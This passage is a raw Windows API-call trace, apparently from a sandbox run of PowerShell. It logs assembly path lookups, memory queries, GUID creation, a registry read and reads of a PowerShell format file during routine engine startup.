lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0140.999] GetLastError () returned 0x57 [0141.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0141.000] GetLastError () returned 0x57 [0141.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0141.001] GetLastError () returned 0x57 [0141.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0141.001] GetLastError () returned 0x57 [0141.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0141.003] GetLastError () returned 0x57 [0141.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0141.004] GetLastError () returned 0x57 [0141.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0141.004] GetLastError () returned 0x57 [0141.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0141.004] GetLastError () returned 0x57 [0141.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.004] GetLastError () returned 0x57 [0141.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.005] GetLastError () returned 0x57 [0141.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.005] GetLastError () returned 0x57 [0141.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.005] GetLastError () returned 0x57 [0141.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.005] GetLastError () returned 0x57 [0141.025] VirtualQuery (in: lpAddress=0x25d040, lpBuffer=0x25e040, dwLength=0x1c | out: lpBuffer=0x25e040*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.029] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xcd112d48, Data2=0xa014, Data3=0x4b8f, Data4=([0]=0x9f, [1]=0x18, [2]=0x89, [3]=0x2a, [4]=0xea, [5]=0x7b, [6]=0x3e, [7]=0x8e))) returned 0x0 [0141.030] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xb03ac2b2, Data2=0x4e2c, Data3=0x4338, Data4=([0]=0xaf, [1]=0x63, [2]=0x50, [3]=0xb8, [4]=0x18, [5]=0x4e, [6]=0xb1, [7]=0x4e))) returned 0x0 [0141.030] VirtualQuery (in: lpAddress=0x25d0b8, lpBuffer=0x25e0b8, dwLength=0x1c | out: lpBuffer=0x25e0b8*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.031] VirtualQuery (in: lpAddress=0x25d0b8, lpBuffer=0x25e0b8, dwLength=0x1c | out: lpBuffer=0x25e0b8*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.031] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xe35f2106, Data2=0x64c0, Data3=0x495e, Data4=([0]=0x98, [1]=0x21, [2]=0xc4, [3]=0xb0, [4]=0x77, [5]=0xb9, [6]=0xac, [7]=0x9))) returned 0x0 [0141.035] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x69ca679c, Data2=0xee04, Data3=0x4719, Data4=([0]=0x9d, [1]=0xf0, [2]=0x3, [3]=0xc8, [4]=0xc1, [5]=0xe9, [6]=0xf8, [7]=0x14))) returned 0x0 [0141.035] VirtualQuery (in: lpAddress=0x25d1e4, lpBuffer=0x25e1e4, dwLength=0x1c | out: lpBuffer=0x25e1e4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.036] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.036] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.036] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x7f1ca26e, Data2=0x26ff, Data3=0x4297, Data4=([0]=0x8a, [1]=0xfb, [2]=0x27, [3]=0xdc, [4]=0xe4, [5]=0x13, [6]=0x97, [7]=0x27))) returned 0x0 [0141.036] VirtualQuery (in: lpAddress=0x25d1e4, lpBuffer=0x25e1e4, dwLength=0x1c | out: lpBuffer=0x25e1e4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.036] VirtualQuery (in: lpAddress=0x25d0fc, lpBuffer=0x25e0fc, dwLength=0x1c | out: lpBuffer=0x25e0fc*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.037] VirtualQuery (in: lpAddress=0x25cdb0, lpBuffer=0x25ddb0, dwLength=0x1c | out: lpBuffer=0x25ddb0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.037] VirtualQuery (in: lpAddress=0x25cdb0, lpBuffer=0x25ddb0, dwLength=0x1c | out: lpBuffer=0x25ddb0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.037] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x5e2331d4, Data2=0x85f1, Data3=0x4e72, Data4=([0]=0xa5, [1]=0x9e, [2]=0xee, [3]=0x75, [4]=0xa7, [5]=0x29, [6]=0x72, [7]=0xc3))) returned 0x0 [0141.037] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xc0a7a665, Data2=0x4434, Data3=0x494b, Data4=([0]=0x8c, [1]=0xf4, [2]=0x3d, [3]=0x6a, [4]=0x95, [5]=0x96, [6]=0x29, [7]=0xa))) returned 0x0 [0141.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25ddfc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0141.038] GetLastError () returned 0x57 [0141.038] SetErrorMode (uMode=0x1) returned 0x1 [0141.038] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0141.038] GetLastError () returned 0x0 [0141.038] GetFileType (hFile=0x328) returned 0x1 [0141.038] SetErrorMode (uMode=0x1) returned 0x1 [0141.038] GetFileType (hFile=0x328) returned 0x1 [0141.038] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.040] GetLastError () returned 0x0 [0141.040] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.041] GetLastError () returned 0x0 [0141.041] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.041] GetLastError () returned 0x0 [0141.041] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.041] GetLastError () returned 0x0 [0141.042] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.042] GetLastError () returned 0x0 [0141.042] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.042] GetLastError () returned 0x0 [0141.042] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.042] GetLastError () returned 0x0 [0141.042] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.042] GetLastError () returned 0x0 [0141.043] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.043] GetLastError () returned 0x0 [0141.043] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.043] GetLastError () returned 0x0 [0141.044] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.044] GetLastError () returned 0x0 [0141.044] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.044] GetLastError () returned 0x0 [0141.044] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.044] GetLastError () returned 0x0 [0141.044] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.044] GetLastError () returned 0x0 [0141.044] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.044] GetLastError () returned 0x0 [0141.044] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.044] GetLastError () returned 0x0 [0141.046] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.046] GetLastError () returned 0x0 [0141.046] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0xbce, lpOverlapped=0x0) returned 1 [0141.046] GetLastError () returned 0x0 [0141.046] ReadFile (in: hFile=0x328, lpBuffer=0x2f0835a, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f0835a*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0141.046] GetLastError () returned 0x0 [0141.046] ReadFile (in: hFile=0x328, lpBuffer=0x2f08bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2f08bec*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0141.046] GetLastError () returned 0x0 [0141.046] CloseHandle (hObject=0x328) returned 1 [0141.047] GetLastError () returned 0x0 [0141.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0141.047] GetLastError () returned 0x0 [0141.047] SetErrorMode (uMode=0x1) returned 0x1 [0141.047] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2f29be8 | out: lpFileInformation=0x2f29be8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0141.047] GetLastError () returned 0x0 [0141.047] SetErrorMode (uMode=0x1) returned 0x1 [0141.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0141.047] GetLastError () returned 0x0 [0141.047] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e2e8 | out: phkResult=0x25e2e8*=0x328) returned 0x0 [0141.047] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x0, lpcbData=0x25e32c*=0x0 | out: lpType=0x25e330*=0x1, lpData=0x0, lpcbData=0x25e32c*=0x56) returned 0x0 [0141.047] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x2e48d0, lpcbData=0x25e32c*=0x56 | out: lpType=0x25e330*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e32c*=0x56) returned 0x0 [0141.048] RegCloseKey (hKey=0x328) returned 0x0 [0141.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0141.048] GetLastError () returned 0x0 [0141.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0141.048] GetLastError () returned 0x0 [0141.050] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xe1c6d569, Data2=0x655d, Data3=0x4b4d, Data4=([0]=0x9c, [1]=0x89, [2]=0x19, [3]=0x68, [4]=0x98, [5]=0xa4, [6]=0x37, [7]=0xf))) returned 0x0 [0141.051] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x3005130c, Data2=0x773b, Data3=0x4bcd, Data4=([0]=0xa3, [1]=0xb2, [2]=0xfd, [3]=0xb2, [4]=0x9c, [5]=0x17, [6]=0xd3, [7]=0xce))) returned 0x0 [0141.051] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xd845557b, Data2=0xe96a, Data3=0x4b02, Data4=([0]=0xbb, [1]=0x11, [2]=0x59, [3]=0xb, [4]=0x4, [5]=0x72, [6]=0xc0, [7]=0x26))) returned 0x0 [0141.051] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xff3b4521, Data2=0x20b, Data3=0x45e1, Data4=([0]=0x9d, [1]=0xae, [2]=0x33, [3]=0x57, [4]=0xd5, [5]=0x2c, [6]=0xe8, [7]=0x97))) returned 0x0 [0141.051] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x98ff95d4, Data2=0x9b91, Data3=0x449d, Data4=([0]=0x88, [1]=0x49, [2]=0xa3, [3]=0xe3, [4]=0x7b, [5]=0x5, [6]=0xff, [7]=0xbd))) returned 0x0 [0141.051] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x19149d85, Data2=0x3ee4, Data3=0x455f, Data4=([0]=0x8c, [1]=0xa, [2]=0xfe, [3]=0x8c, [4]=0xb5, [5]=0x86, [6]=0x76, [7]=0x31))) returned 0x0 [0141.051] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.052] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x674af15b, Data2=0xf688, Data3=0x4bc7, Data4=([0]=0xaa, [1]=0x3f, [2]=0xad, [3]=0x38, [4]=0x7c, [5]=0x3b, [6]=0x85, [7]=0xa8))) returned 0x0 [0141.052] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.052] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.052] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xf22257f9, Data2=0x336f, Data3=0x4a99, Data4=([0]=0xbe, [1]=0x1, [2]=0x29, [3]=0x22, [4]=0x8f, [5]=0x14, [6]=0x6a, [7]=0x5a))) returned 0x0 [0141.052] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xe709ef6d, Data2=0x1cc8, Data3=0x44a4, Data4=([0]=0xa3, [1]=0x72, [2]=0x77, [3]=0xa, [4]=0x62, [5]=0xb5, [6]=0xf1, [7]=0x6))) returned 0x0 [0141.052] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xe396aa7b, Data2=0x2cf2, Data3=0x49fa, Data4=([0]=0x98, [1]=0x70, [2]=0xef, [3]=0xc1, [4]=0xab, [5]=0x15, [6]=0xfa, [7]=0x54))) returned 0x0 [0141.053] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xf552ab5a, Data2=0xef8c, Data3=0x43c1, Data4=([0]=0x95, [1]=0x7a, [2]=0xd2, [3]=0xe2, [4]=0xfb, [5]=0xa7, [6]=0x2d, [7]=0x1b))) returned 0x0 [0141.053] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.053] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x65fda37d, Data2=0x15dd, Data3=0x435d, Data4=([0]=0xb5, [1]=0x91, [2]=0x1e, [3]=0xdd, [4]=0x48, [5]=0x2e, [6]=0xbd, [7]=0x85))) returned 0x0 [0141.053] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.053] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.054] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.054] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.054] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.055] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x7fcbea14, Data2=0x36ae, Data3=0x42c2, Data4=([0]=0x96, [1]=0x8e, [2]=0xf0, [3]=0x59, [4]=0xba, [5]=0x41, [6]=0xdd, [7]=0x60))) returned 0x0 [0141.055] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xa3a1cd5d, Data2=0x7e9e, Data3=0x4c8f, Data4=([0]=0xbb, [1]=0x54, [2]=0xe7, [3]=0xd, [4]=0x22, [5]=0x7a, [6]=0xa8, [7]=0x93))) returned 0x0 [0141.055] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xe2425439, Data2=0x8b9f, Data3=0x4f00, Data4=([0]=0x89, [1]=0xe1, [2]=0x64, [3]=0x62, [4]=0xc5, [5]=0x4, [6]=0x42, [7]=0x84))) returned 0x0 [0141.055] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xe38c250f, Data2=0x8a73, Data3=0x41d5, Data4=([0]=0x89, [1]=0x62, [2]=0xd2, [3]=0xea, [4]=0xcf, [5]=0x4d, [6]=0x69, [7]=0x9d))) returned 0x0 [0141.055] CoCreateGuid (in: pguid=0x25e358 | out: 